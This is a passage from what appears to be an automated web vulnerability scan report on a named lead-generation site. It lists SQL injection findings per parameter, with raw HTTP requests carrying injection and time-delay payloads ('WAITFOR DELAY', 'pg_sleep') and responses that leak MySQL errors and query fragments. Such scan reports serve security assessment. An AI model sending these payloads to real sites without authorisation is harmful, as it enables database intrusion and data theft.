OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:23:04 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7118
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ibles&attributeId_555_t=&attributeId_556_t=&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2742__None currently&attributeId_487[]=3199__Not sure&attributeId_488[]=3205_' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR%00''&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=&attributeId_491_t=&attributeId_492_t=&attributeId_493_t=&attributeId_514_t=&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=&attributeId_556_t=&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=bg5bamf9r296qlbk2sumhl6ko7; JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:23:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36090


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.333. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_344_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_344_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR'&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=rg6i0ehntokp7a30mlnnestuj3; path=/
Content-Length: 7318
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

1.334. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_344_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--'&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:12:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2742__None currently&attributeId_487[]=3199__Not sure&attributeId_488[]=3205_' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--''&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:12:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.335. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_421 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_421 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_421 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No'&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1p2245v2oppuait1b0atupekj6; path=/
Content-Length: 7318
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

1.336. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_421 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_421 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_421 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No'&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:13:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2742__None currently&attributeId_487[]=3199__Not sure&attributeId_488[]=3205_' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No''&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:13:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.337. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_422%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_422%5B%5D parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_422%5B%5D parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently'&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1c45b25h0q0bscfrk0s7qs9ei3; path=/
Content-Length: 7318
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

1.338. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_422%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_422%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_422%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently'&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:13:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=3199__Not sure&attributeId_488[]=3205__Dental insurance&attributeId_489_t=3&a' at line 5

Request 2

